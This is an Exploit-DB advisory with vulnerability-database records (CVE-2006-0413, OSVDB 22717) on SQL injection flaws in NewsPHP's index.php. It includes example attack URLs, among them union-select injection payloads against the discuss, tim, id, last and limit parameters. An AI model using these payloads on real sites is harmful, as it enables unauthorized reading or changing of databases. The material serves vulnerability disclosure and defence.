source: http://www.securityfocus.com/bid/16339/info
NewsPHP is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
http://www.example.com/index.php?discuss=SQL
http://www.example.com/index.php?tim=SQL
http://www.example.com/index.php?id=SQL
http://www.example.com/index.php?words=%20&where=1&limit=40&last=SQL
http://www.example.com/index.php?words=%20&where=1&limit=SQL
http://www.example.com/index.php?words=&where=1&submitted=true&address=E-mail+Address&action=add&rate=5&id=(SQL)&article_rate=Rate
http://www.example.com/ndex.php?id=-99 union select null,null,null,null,null,null,null,null,null from newsphp.pro/*
http://www.example.com/index.php?tim=-1 union select null,null,null,null,null,null,null,null,null from newsphp.pro/*
{"id": "EDB-ID:27116", "type": "exploitdb", "bulletinFamily": "exploit", "title": "NewsPHP Index.PHP Multiple SQL Injection Vulnerabilities", "description": "NewsPHP Index.PHP Multiple SQL Injection Vulnerabilities. CVE-2006-0413. Webapps exploit for php platform", "published": "2006-01-23T00:00:00", "modified": "2006-01-23T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/27116/", "reporter": "SAUDI", "references": [], "cvelist": ["CVE-2006-0413"], "lastseen": "2016-02-03T05:08:50", "viewCount": 4, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-02-03T05:08:50", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-0413"]}, {"type": "osvdb", "idList": ["OSVDB:22717"]}], "modified": "2016-02-03T05:08:50", "rev": 2}, "vulnersScore": 7.4}, "sourceHref": "https://www.exploit-db.com/download/27116/", "sourceData": "source: http://www.securityfocus.com/bid/16339/info\r\n\r\nNewsPHP is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.\r\n\r\nSuccessful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. \r\n\r\nhttp://www.example.com/index.php?discuss=SQL\r\n\r\nhttp://www.example.com/index.php?tim=SQL\r\n\r\nhttp://www.example.com/index.php?id=SQL\r\n\r\nhttp://www.example.com/index.php?words=%20&where=1&limit=40&last=SQL\r\n\r\nhttp://www.example.com/index.php?words=%20&where=1&limit=SQL\r\n\r\nhttp://www.example.com/index.php?words=&where=1&submitted=true&address=E-mail+Address&action=add&rate=5&id=(SQL)&article_rate=Rate\r\n\r\nhttp://www.example.com/ndex.php?id=-99 union select null,null,null,null,null,null,null,null,null from newsphp.pro/*\r\n\r\nhttp://www.example.com/index.php?tim=-1 union select null,null,null,null,null,null,null,null,null from newsphp.pro/* ", "osvdbidlist": ["22717"]}
{"cve": [{"lastseen": "2020-10-03T11:48:12", "description": "Multiple SQL injection vulnerabilities in index.php in NewsPHP allow remote attackers to execute arbitrary SQL commands via the (1) discuss, (2) tim, (3) id, (4) last, and (5) limit parameter.", "edition": 3, "cvss3": {}, "published": "2006-01-25T11:03:00", "title": "CVE-2006-0413", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0413"], "modified": "2018-10-19T15:44:00", "cpe": ["cpe:/a:newsphp:newsphp:*"], "id": "CVE-2006-0413", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0413", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:newsphp:newsphp:*:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:19", "bulletinFamily": "software", "cvelist": ["CVE-2006-0413"], "edition": 1, "description": "## Vulnerability Description\nNewsPHP contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'discuss', 'tim', 'id', 'last' and 'limit' variables. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nNewsPHP contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'discuss', 'tim', 'id', 'last' and 'limit' variables. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[target]/ndex.php?id=-99 union select null,null,null,null,null,null,null,null,null from newsphp.pro/*\n\nhttp://[target]/index.php?tim=-1 union select null,null,null,null,null,null,null,null,null from newsphp.pro/*\n## References:\nVendor URL: http://www.newsphp.com/\n[Secunia Advisory ID:18624](https://secuniaresearch.flexerasoftware.com/advisories/18624/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-01/0411.html\nISS X-Force ID: 24320\nFrSIRT Advisory: ADV-2006-0341\n[CVE-2006-0413](https://vulners.com/cve/CVE-2006-0413)\nBugtraq ID: 16339\n", "modified": "2006-01-22T04:32:38", "published": "2006-01-22T04:32:38", "href": "https://vulners.com/osvdb/OSVDB:22717", "id": "OSVDB:22717", "type": "osvdb", "title": "NewsPHP index.php Multiple Variable SQL Injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}